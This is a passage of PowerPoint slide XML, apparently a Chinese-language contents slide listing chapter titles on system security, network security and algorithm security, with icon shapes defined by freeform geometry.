            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="100" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="微软雅黑 Light"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997171" y="3232150"/>
            <a:ext cx="3268844"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00" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第三篇  系统安全篇</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="100" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="微软雅黑 Light"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997171" y="4020273"/>
            <a:ext cx="3268844"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00" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第四篇  网络安全篇</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="100" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="微软雅黑 Light"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997171" y="4794540"/>
            <a:ext cx="3268844"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00" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第五篇  算法安全篇</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="100" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="微软雅黑 Light"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="组合 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="13704847" y="1955990"/>
            <a:ext cx="479425" cy="481013"/>
            <a:chOff x="2558424" y="1401428"/>
            <a:chExt cx="1318727" cy="1318727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="椭圆 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2558424" y="1401428"/>
              <a:ext cx="1318727" cy="1318727"/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8216" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2676010" y="1814946"/>
              <a:ext cx="1083553" cy="597017"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 11105 w 683"/>
                <a:gd name="T1" fmla="*/ 187362 h 376"/>
                <a:gd name="T2" fmla="*/ 529878 w 683"/>
                <a:gd name="T3" fmla="*/ 1588 h 376"/>
                <a:gd name="T4" fmla="*/ 540983 w 683"/>
                <a:gd name="T5" fmla="*/ 1588 h 376"/>
                <a:gd name="T6" fmla="*/ 1070861 w 683"/>
                <a:gd name="T7" fmla="*/ 187362 h 376"/>
                <a:gd name="T8" fmla="*/ 1083553 w 683"/>
                <a:gd name="T9" fmla="*/ 204828 h 376"/>
                <a:gd name="T10" fmla="*/ 1070861 w 683"/>
                <a:gd name="T11" fmla="*/ 220706 h 376"/>
                <a:gd name="T12" fmla="*/ 890005 w 683"/>
                <a:gd name="T13" fmla="*/ 273104 h 376"/>
                <a:gd name="T14" fmla="*/ 536224 w 683"/>
                <a:gd name="T15" fmla="*/ 188950 h 376"/>
                <a:gd name="T16" fmla="*/ 520359 w 683"/>
                <a:gd name="T17" fmla="*/ 206415 h 376"/>
                <a:gd name="T18" fmla="*/ 536224 w 683"/>
                <a:gd name="T19" fmla="*/ 222294 h 376"/>
                <a:gd name="T20" fmla="*/ 864621 w 683"/>
                <a:gd name="T21" fmla="*/ 293745 h 376"/>
                <a:gd name="T22" fmla="*/ 864621 w 683"/>
                <a:gd name="T23" fmla="*/ 404892 h 376"/>
                <a:gd name="T24" fmla="*/ 864621 w 683"/>
                <a:gd name="T25" fmla="*/ 406480 h 376"/>
                <a:gd name="T26" fmla="*/ 534637 w 683"/>
                <a:gd name="T27" fmla="*/ 484282 h 376"/>
                <a:gd name="T28" fmla="*/ 206240 w 683"/>
                <a:gd name="T29" fmla="*/ 406480 h 376"/>
                <a:gd name="T30" fmla="*/ 206240 w 683"/>
                <a:gd name="T31" fmla="*/ 404892 h 376"/>
                <a:gd name="T32" fmla="*/ 206240 w 683"/>
                <a:gd name="T33" fmla="*/ 276279 h 376"/>
                <a:gd name="T34" fmla="*/ 112639 w 683"/>
                <a:gd name="T35" fmla="*/ 249286 h 376"/>
                <a:gd name="T36" fmla="*/ 112639 w 683"/>
                <a:gd name="T37" fmla="*/ 395365 h 376"/>
                <a:gd name="T38" fmla="*/ 145954 w 683"/>
                <a:gd name="T39" fmla="*/ 439824 h 376"/>
                <a:gd name="T40" fmla="*/ 118985 w 683"/>
                <a:gd name="T41" fmla="*/ 481107 h 376"/>
                <a:gd name="T42" fmla="*/ 130090 w 683"/>
                <a:gd name="T43" fmla="*/ 536680 h 376"/>
                <a:gd name="T44" fmla="*/ 44421 w 683"/>
                <a:gd name="T45" fmla="*/ 573200 h 376"/>
                <a:gd name="T46" fmla="*/ 61872 w 683"/>
                <a:gd name="T47" fmla="*/ 477931 h 376"/>
                <a:gd name="T48" fmla="*/ 41248 w 683"/>
                <a:gd name="T49" fmla="*/ 439824 h 376"/>
                <a:gd name="T50" fmla="*/ 72977 w 683"/>
                <a:gd name="T51" fmla="*/ 395365 h 376"/>
                <a:gd name="T52" fmla="*/ 72977 w 683"/>
                <a:gd name="T53" fmla="*/ 238172 h 376"/>
                <a:gd name="T54" fmla="*/ 12692 w 683"/>
                <a:gd name="T55" fmla="*/ 220706 h 376"/>
                <a:gd name="T56" fmla="*/ 0 w 683"/>
                <a:gd name="T57" fmla="*/ 204828 h 376"/>
                <a:gd name="T58" fmla="*/ 11105 w 683"/>
                <a:gd name="T59" fmla="*/ 187362 h 37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Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="13704847" y="2716403"/>
            <a:ext cx="479425" cy="481012"/>
            <a:chOff x="1928879" y="1944350"/>
            <a:chExt cx="1129689" cy="1129689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="椭圆 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1928879" y="1944350"/>
              <a:ext cx="1129689" cy="1129689"/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8214" name="Freeform 7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2108994" y="2226858"/>
              <a:ext cx="751325" cy="615695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 413696 w 563"/>
                <a:gd name="T1" fmla="*/ 496830 h 461"/>
                <a:gd name="T2" fmla="*/ 428375 w 563"/>
                <a:gd name="T3" fmla="*/ 494159 h 461"/>
                <a:gd name="T4" fmla="*/ 736645 w 563"/>
                <a:gd name="T5" fmla="*/ 331220 h 461"/>
                <a:gd name="T6" fmla="*/ 745987 w 563"/>
                <a:gd name="T7" fmla="*/ 301837 h 461"/>
                <a:gd name="T8" fmla="*/ 716628 w 563"/>
                <a:gd name="T9" fmla="*/ 293824 h 461"/>
                <a:gd name="T10" fmla="*/ 415030 w 563"/>
                <a:gd name="T11" fmla="*/ 452756 h 461"/>
                <a:gd name="T12" fmla="*/ 78736 w 563"/>
                <a:gd name="T13" fmla="*/ 380636 h 461"/>
                <a:gd name="T14" fmla="*/ 50711 w 563"/>
                <a:gd name="T15" fmla="*/ 337898 h 461"/>
                <a:gd name="T16" fmla="*/ 94750 w 563"/>
                <a:gd name="T17" fmla="*/ 309851 h 461"/>
                <a:gd name="T18" fmla="*/ 417699 w 563"/>
                <a:gd name="T19" fmla="*/ 377965 h 461"/>
                <a:gd name="T20" fmla="*/ 428375 w 563"/>
                <a:gd name="T21" fmla="*/ 375293 h 461"/>
                <a:gd name="T22" fmla="*/ 736645 w 563"/>
                <a:gd name="T23" fmla="*/ 212355 h 461"/>
                <a:gd name="T24" fmla="*/ 745987 w 563"/>
                <a:gd name="T25" fmla="*/ 184308 h 461"/>
                <a:gd name="T26" fmla="*/ 716628 w 563"/>
                <a:gd name="T27" fmla="*/ 174959 h 461"/>
                <a:gd name="T28" fmla="*/ 413696 w 563"/>
                <a:gd name="T29" fmla="*/ 335227 h 461"/>
                <a:gd name="T30" fmla="*/ 78736 w 563"/>
                <a:gd name="T31" fmla="*/ 263106 h 461"/>
                <a:gd name="T32" fmla="*/ 50711 w 563"/>
                <a:gd name="T33" fmla="*/ 219032 h 461"/>
                <a:gd name="T34" fmla="*/ 94750 w 563"/>
                <a:gd name="T35" fmla="*/ 190986 h 461"/>
                <a:gd name="T36" fmla="*/ 397682 w 563"/>
                <a:gd name="T37" fmla="*/ 255093 h 461"/>
                <a:gd name="T38" fmla="*/ 408358 w 563"/>
                <a:gd name="T39" fmla="*/ 252422 h 461"/>
                <a:gd name="T40" fmla="*/ 717962 w 563"/>
                <a:gd name="T41" fmla="*/ 92154 h 461"/>
                <a:gd name="T42" fmla="*/ 713959 w 563"/>
                <a:gd name="T43" fmla="*/ 64107 h 461"/>
                <a:gd name="T44" fmla="*/ 413696 w 563"/>
                <a:gd name="T45" fmla="*/ 5342 h 461"/>
                <a:gd name="T46" fmla="*/ 332291 w 563"/>
                <a:gd name="T47" fmla="*/ 16027 h 461"/>
                <a:gd name="T48" fmla="*/ 54715 w 563"/>
                <a:gd name="T49" fmla="*/ 152254 h 461"/>
                <a:gd name="T50" fmla="*/ 44039 w 563"/>
                <a:gd name="T51" fmla="*/ 158932 h 461"/>
                <a:gd name="T52" fmla="*/ 9342 w 563"/>
                <a:gd name="T53" fmla="*/ 209684 h 461"/>
                <a:gd name="T54" fmla="*/ 33363 w 563"/>
                <a:gd name="T55" fmla="*/ 285811 h 461"/>
                <a:gd name="T56" fmla="*/ 9342 w 563"/>
                <a:gd name="T57" fmla="*/ 328549 h 461"/>
                <a:gd name="T58" fmla="*/ 33363 w 563"/>
                <a:gd name="T59" fmla="*/ 404676 h 461"/>
                <a:gd name="T60" fmla="*/ 9342 w 563"/>
                <a:gd name="T61" fmla="*/ 447414 h 461"/>
                <a:gd name="T62" fmla="*/ 69394 w 563"/>
                <a:gd name="T63" fmla="*/ 540903 h 461"/>
                <a:gd name="T64" fmla="*/ 415030 w 563"/>
                <a:gd name="T65" fmla="*/ 614359 h 461"/>
                <a:gd name="T66" fmla="*/ 428375 w 563"/>
                <a:gd name="T67" fmla="*/ 613024 h 461"/>
                <a:gd name="T68" fmla="*/ 736645 w 563"/>
                <a:gd name="T69" fmla="*/ 450085 h 461"/>
                <a:gd name="T70" fmla="*/ 745987 w 563"/>
                <a:gd name="T71" fmla="*/ 420703 h 461"/>
                <a:gd name="T72" fmla="*/ 716628 w 563"/>
                <a:gd name="T73" fmla="*/ 411354 h 461"/>
                <a:gd name="T74" fmla="*/ 413696 w 563"/>
                <a:gd name="T75" fmla="*/ 571621 h 461"/>
                <a:gd name="T76" fmla="*/ 78736 w 563"/>
                <a:gd name="T77" fmla="*/ 499501 h 461"/>
                <a:gd name="T78" fmla="*/ 50711 w 563"/>
                <a:gd name="T79" fmla="*/ 455427 h 461"/>
                <a:gd name="T80" fmla="*/ 94750 w 563"/>
                <a:gd name="T81" fmla="*/ 427380 h 461"/>
                <a:gd name="T82" fmla="*/ 413696 w 563"/>
                <a:gd name="T83" fmla="*/ 496830 h 461"/>
                <a:gd name="T84" fmla="*/ 395013 w 563"/>
                <a:gd name="T85" fmla="*/ 76127 h 461"/>
                <a:gd name="T86" fmla="*/ 539139 w 563"/>
                <a:gd name="T87" fmla="*/ 104174 h 461"/>
                <a:gd name="T88" fmla="*/ 476417 w 563"/>
                <a:gd name="T89" fmla="*/ 134892 h 461"/>
                <a:gd name="T90" fmla="*/ 332291 w 563"/>
                <a:gd name="T91" fmla="*/ 105510 h 461"/>
                <a:gd name="T92" fmla="*/ 395013 w 563"/>
                <a:gd name="T93" fmla="*/ 76127 h 4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Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="13704847" y="3476815"/>
            <a:ext cx="479425" cy="481013"/>
            <a:chOff x="1928879" y="1944350"/>
            <a:chExt cx="1129689" cy="1129689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="椭圆 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1928879" y="1944350"/>
              <a:ext cx="1129689" cy="1129689"/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8212" name="Freeform 18"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2155101" y="2105687"/>
              <a:ext cx="659346" cy="790830"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 659346 w 456"/>
                <a:gd name="T1" fmla="*/ 761968 h 548"/>
                <a:gd name="T2" fmla="*/ 630427 w 456"/>
                <a:gd name="T3" fmla="*/ 790830 h 548"/>
                <a:gd name="T4" fmla="*/ 121458 w 456"/>
                <a:gd name="T5" fmla="*/ 790830 h 548"/>
                <a:gd name="T6" fmla="*/ 0 w 456"/>
                <a:gd name="T7" fmla="*/ 669608 h 548"/>
                <a:gd name="T8" fmla="*/ 121458 w 456"/>
                <a:gd name="T9" fmla="*/ 548386 h 548"/>
                <a:gd name="T10" fmla="*/ 630427 w 456"/>
                <a:gd name="T11" fmla="*/ 548386 h 548"/>
                <a:gd name="T12" fmla="*/ 659346 w 456"/>
                <a:gd name="T13" fmla="*/ 575805 h 548"/>
                <a:gd name="T14" fmla="*/ 630427 w 456"/>
                <a:gd name="T15" fmla="*/ 604667 h 548"/>
                <a:gd name="T16" fmla="*/ 130134 w 456"/>
                <a:gd name="T17" fmla="*/ 604667 h 548"/>
                <a:gd name="T18" fmla="*/ 65067 w 456"/>
                <a:gd name="T19" fmla="*/ 669608 h 548"/>
                <a:gd name="T20" fmla="*/ 130134 w 456"/>
                <a:gd name="T21" fmla="*/ 734548 h 548"/>
                <a:gd name="T22" fmla="*/ 630427 w 456"/>
                <a:gd name="T23" fmla="*/ 734548 h 548"/>
                <a:gd name="T24" fmla="*/ 659346 w 456"/>
                <a:gd name="T25" fmla="*/ 761968 h 548"/>
                <a:gd name="T26" fmla="*/ 339795 w 456"/>
                <a:gd name="T27" fmla="*/ 112563 h 548"/>
                <a:gd name="T28" fmla="*/ 446794 w 456"/>
                <a:gd name="T29" fmla="*/ 8659 h 548"/>
                <a:gd name="T30" fmla="*/ 446794 w 456"/>
                <a:gd name="T31" fmla="*/ 0 h 548"/>
                <a:gd name="T32" fmla="*/ 438118 w 456"/>
                <a:gd name="T33" fmla="*/ 0 h 548"/>
                <a:gd name="T34" fmla="*/ 329673 w 456"/>
                <a:gd name="T35" fmla="*/ 103905 h 548"/>
                <a:gd name="T36" fmla="*/ 331119 w 456"/>
                <a:gd name="T37" fmla="*/ 111120 h 548"/>
                <a:gd name="T38" fmla="*/ 339795 w 456"/>
                <a:gd name="T39" fmla="*/ 112563 h 548"/>
                <a:gd name="T40" fmla="*/ 537888 w 456"/>
                <a:gd name="T41" fmla="*/ 197708 h 548"/>
                <a:gd name="T42" fmla="*/ 426551 w 456"/>
                <a:gd name="T43" fmla="*/ 122665 h 548"/>
                <a:gd name="T44" fmla="*/ 335457 w 456"/>
                <a:gd name="T45" fmla="*/ 141426 h 548"/>
                <a:gd name="T46" fmla="*/ 245809 w 456"/>
                <a:gd name="T47" fmla="*/ 122665 h 548"/>
                <a:gd name="T48" fmla="*/ 134472 w 456"/>
                <a:gd name="T49" fmla="*/ 197708 h 548"/>
                <a:gd name="T50" fmla="*/ 253038 w 456"/>
                <a:gd name="T51" fmla="*/ 492104 h 548"/>
                <a:gd name="T52" fmla="*/ 335457 w 456"/>
                <a:gd name="T53" fmla="*/ 473344 h 548"/>
                <a:gd name="T54" fmla="*/ 419321 w 456"/>
                <a:gd name="T55" fmla="*/ 492104 h 548"/>
                <a:gd name="T56" fmla="*/ 537888 w 456"/>
                <a:gd name="T57" fmla="*/ 197708 h 548"/>
                <a:gd name="T58" fmla="*/ 248701 w 456"/>
                <a:gd name="T59" fmla="*/ 181833 h 548"/>
                <a:gd name="T60" fmla="*/ 242917 w 456"/>
                <a:gd name="T61" fmla="*/ 181833 h 548"/>
                <a:gd name="T62" fmla="*/ 185080 w 456"/>
                <a:gd name="T63" fmla="*/ 232342 h 548"/>
                <a:gd name="T64" fmla="*/ 172066 w 456"/>
                <a:gd name="T65" fmla="*/ 243887 h 548"/>
                <a:gd name="T66" fmla="*/ 170620 w 456"/>
                <a:gd name="T67" fmla="*/ 243887 h 548"/>
                <a:gd name="T68" fmla="*/ 167728 w 456"/>
                <a:gd name="T69" fmla="*/ 242444 h 548"/>
                <a:gd name="T70" fmla="*/ 157607 w 456"/>
                <a:gd name="T71" fmla="*/ 226570 h 548"/>
                <a:gd name="T72" fmla="*/ 242917 w 456"/>
                <a:gd name="T73" fmla="*/ 152971 h 548"/>
                <a:gd name="T74" fmla="*/ 250147 w 456"/>
                <a:gd name="T75" fmla="*/ 152971 h 548"/>
                <a:gd name="T76" fmla="*/ 261714 w 456"/>
                <a:gd name="T77" fmla="*/ 168845 h 548"/>
                <a:gd name="T78" fmla="*/ 248701 w 456"/>
                <a:gd name="T79" fmla="*/ 181833 h 548"/>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56" h="548">
                  <a:moveTo>
                    <a:pt x="456" y="528"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="456" y="539"/>
                    <a:pt x="447" y="548"/>
                    <a:pt x="436" y="548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="548"/>
                    <a:pt x="84" y="548"/>
                    <a:pt x="84" y="548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="548"/>
                    <a:pt x="0" y="510"/>
                    <a:pt x="0" y="464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="417"/>
                    <a:pt x="38" y="380"/>
                    <a:pt x="84" y="380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="436" y="380"/>
                    <a:pt x="436" y="380"/>
                    <a:pt x="436" y="380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="380"/>
                    <a:pt x="456" y="389"/>
                    <a:pt x="456" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="456" y="410"/>
                    <a:pt x="447" y="419"/>
                    <a:pt x="436" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="419"/>
                    <a:pt x="90" y="419"/>
                    <a:pt x="90" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="419"/>
                    <a:pt x="45" y="439"/>
                    <a:pt x="45" y="464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="488"/>
                    <a:pt x="65" y="509"/>
                    <a:pt x="90" y="509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="436" y="509"/>
                    <a:pt x="436" y="509"/>
                    <a:pt x="436" y="509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="509"/>
                    <a:pt x="456" y="518"/>
                    <a:pt x="456" y="528"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="235" y="78"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="78"/>
                    <a:pt x="309" y="45"/>
                    <a:pt x="309" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309" y="4"/>
                    <a:pt x="309" y="2"/>
                    <a:pt x="309" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="0"/>
                    <a:pt x="305" y="0"/>
                    <a:pt x="303" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262" y="0"/>
                    <a:pt x="228" y="32"/>
                    <a:pt x="228" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="74"/>
                    <a:pt x="228" y="76"/>
                    <a:pt x="229" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="78"/>
                    <a:pt x="233" y="78"/>
                    <a:pt x="235" y="78"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="372" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="102"/>
                    <a:pt x="321" y="85"/>
                    <a:pt x="295" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="85"/>
                    <a:pt x="257" y="98"/>
                    <a:pt x="232" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="98"/>
                    <a:pt x="202" y="85"/>
                    <a:pt x="170" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="85"/>
                    <a:pt x="108" y="102"/>
                    <a:pt x="93" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="207"/>
                    <a:pt x="114" y="341"/>
                    <a:pt x="175" y="341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="341"/>
                    <a:pt x="210" y="328"/>
                    <a:pt x="232" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="328"/>
                    <a:pt x="265" y="341"/>
                    <a:pt x="290" y="341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="341"/>
                    <a:pt x="403" y="207"/>
                    <a:pt x="372" y="137"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="172" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="126"/>
                    <a:pt x="169" y="126"/>
                    <a:pt x="168" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="126"/>
                    <a:pt x="132" y="138"/>
                    <a:pt x="128" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="165"/>
                    <a:pt x="123" y="169"/>
                    <a:pt x="119" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="169"/>
                    <a:pt x="118" y="169"/>
                    <a:pt x="118" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="169"/>
                    <a:pt x="117" y="169"/>
                    <a:pt x="116" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="167"/>
                    <a:pt x="108" y="162"/>
                    <a:pt x="109" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="125"/>
                    <a:pt x="144" y="106"/>
                    <a:pt x="168" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="106"/>
                    <a:pt x="171" y="106"/>
                    <a:pt x="173" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="107"/>
                    <a:pt x="182" y="112"/>
                    <a:pt x="181" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="122"/>
                    <a:pt x="177" y="126"/>
                    <a:pt x="172" y="12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Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
